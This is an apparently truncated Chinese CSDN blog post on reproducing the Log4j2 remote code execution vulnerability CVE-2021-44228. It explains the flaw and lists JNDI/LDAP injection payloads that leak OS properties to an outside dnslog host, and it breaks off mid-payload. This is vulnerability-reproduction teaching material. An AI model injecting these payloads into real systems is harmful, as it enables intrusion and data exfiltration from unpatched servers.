【漏洞复现】 Log4j2远程命令执行(CVE-2021-44228)

166 篇文章 58 订阅 ¥9.90 ¥99.00
178 篇文章 2 订阅
本文详细介绍了Log4j2的CVE-2021-44228远程命令执行漏洞,包括漏洞原理、PoC测试、Exp利用,以及在Apache Solr和Struts2环境中的复现过程。同时提到了vulfocus平台上的漏洞环境和log4j2burpscanner扫描插件的使用。
摘要由CSDN通过智能技术生成

漏洞介绍

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。

影响范围:Apache Log4j 2.x<=2.14.1

poc

存在漏洞是因为在写日志的时候存在问题,所以对于黑盒测试而言,只要是能够被服务端获取且被记录的地方都是可以触发漏洞的,比如 header 中的 Cookie、User-agent 等,post 或者 get 的参数中,url 中等,这种只能盲打,根据返回结果来判断。

利用 dnslog 检测并外带数据

${jndi:ldap://${sys:os.name}.btcepgqfym.dnstunnel.run}
${jndi:ldap://${sys:os.arch}.btcepgqfym.dnstunnel.run}
${jndi:ldap://${sys:os.version}.btcepgqfym.dnstunnel.run}
${jndi:ldap://${sys:user.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值